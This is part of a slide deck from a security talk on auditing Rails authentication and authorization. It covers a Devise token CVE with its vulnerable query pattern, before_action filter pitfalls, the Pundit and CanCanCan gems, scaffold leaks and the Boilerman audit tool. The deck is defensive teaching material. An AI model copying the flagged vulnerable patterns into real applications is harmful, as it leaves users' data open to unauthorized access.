>= v2.2.3, v2.1.3, v2.0.5 and v1.5.4
CVE-2013-0233
33
Fixed in Rails
= 3.2.12 https://github.com/rails/rails/pull/9208
>= 4.2.0 https://github.com/rails/rails/pull/16069
Reverted in Rails
>= 3.2.13 https://github.com/rails/rails/issues/9292
Core vulnerability effects more
than just Devise!
User.where(“token=?”, params[token])
Thanks to @joernchen of Phenoelit
34. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Authorization
What can they do?
Often tied to the concept of roles
34
Vertical Authorization
Site Admin (Full Access)
Organization Admin (Full Access to specific Org)
“Regular User” (Limited Read Access + Local Write Access)
Unauthenticated (No Access)
Horizontal Authorization
Org1 vs Org2 Data
Within an Org, User1 vs User2 Data
35. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Authorization - Rails
35
Vertical Authorization
before_actions
Horizontal Authorization
Associations
36. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Controller Routing
Given a route: get '/posts', to: 'posts#index'
36
Method path controller # action
37. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Controller Hierarchy
37
38. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
How they work
3 types of callbacks
- :before, :around, :after
- Authorization tends to only care about before_actions
38
-‐ before_action :authorize_user, only: [:action1, :action2, …]
-‐ before_action :authorize_user, except: [:action1, :action2, …]
-‐ before_action :authorize_user, if: method_call
-‐ before_action :authorize_user, unless: method_call
-‐ skip_before_action :authorize_user, only: [:action1, :action2, …]
-‐ skip_before_action :authorize_user, except: [:action1, :action2, …]
-‐ before_action :authorize_user, Proc.new {|controller| #AUTHZ Logic… }
http://api.rubyonrails.org/classes/ActiveSupport/Callbacks.html
Different flavors
39. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Authorization Gems
Pundit
- Enforced through the use of Policy classes
@post = Post.find(params[:id])
authorize @post
- https://github.com/elabs/pundit
CanCan(Can)
- Enforced through the use of an Ability class
- https://github.com/CanCanCommunity/cancancan
39
40. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
CanCanCan Basics
40
41. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Be On The Lookout For…
find_by methods called directly on the model
41
GOOD
CAUTION
42. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Be On The Lookout For…
before_action … only: [:action1, :action2]
42
CAUTION
GOOD
43. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Be On The Lookout For…
Lightweight Controllers
43
GOOD
CAUTION
44. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Be On The Lookout For…
Authorization Logic in Views
44
Ensure the application is also verifying permissions in controller action
CAUTION
45. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Be On The Lookout For…
Skipping of filters
45
Skips the :authorize_admin filter for every action
can be an artifact left over from testing/development
46. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Rails Scaffolding
46
47. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Be On The Lookout For…
/app/views/bank_accts/show.json.jbuilder:
json.extract @bank_acct, :id, :acct_number, :acct_balance, :acct_holder_name, …
47
http://rubyjunky.com/rails-scaffold-dangerous-defaults.html?utm_source=rubyweekly&utm_medium=email
Possible unwanted attributes added to view or strong_parameters
Generator/Scaffold artifacts
48. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
New Tool: Boilerman
Before Boilerman
Audit every Controller manually
Track inheritance / overrides
Mind the gaps
48
https://github.com/tomekr/boilerman
With Boilerman
Dynamically resolve callbacks
See all filters for a given Controller#Action
Filter the list dynamically
In browser or Rails Console
49. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
New Tool: Boilerman
Dynamic analysis tool
Plugs into an existing Rails application
Rails console access needed
As a minimum requirement
Mounted as a Rails engine
Accessed at /boilerman
or through Rails Console
49
https://github.com/tomekr/boilerman
50. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Boilerman Demo
Praise be to the almighty demo gods.
50
51. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Boilerman
Install: gem install boilerman
Takeaways
Rails console can be a very powerful tool
Future Ideas
D3 visualizations
matrix of Controller#Action & Filter pairs
Source querying via pry’s source functionality
Useful for auditing Pundit based authorization schemes
51
52. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train
Questions?
52
Tomek Rabczak
@sigdroid
Jeff Jarmoc
@jjarmoc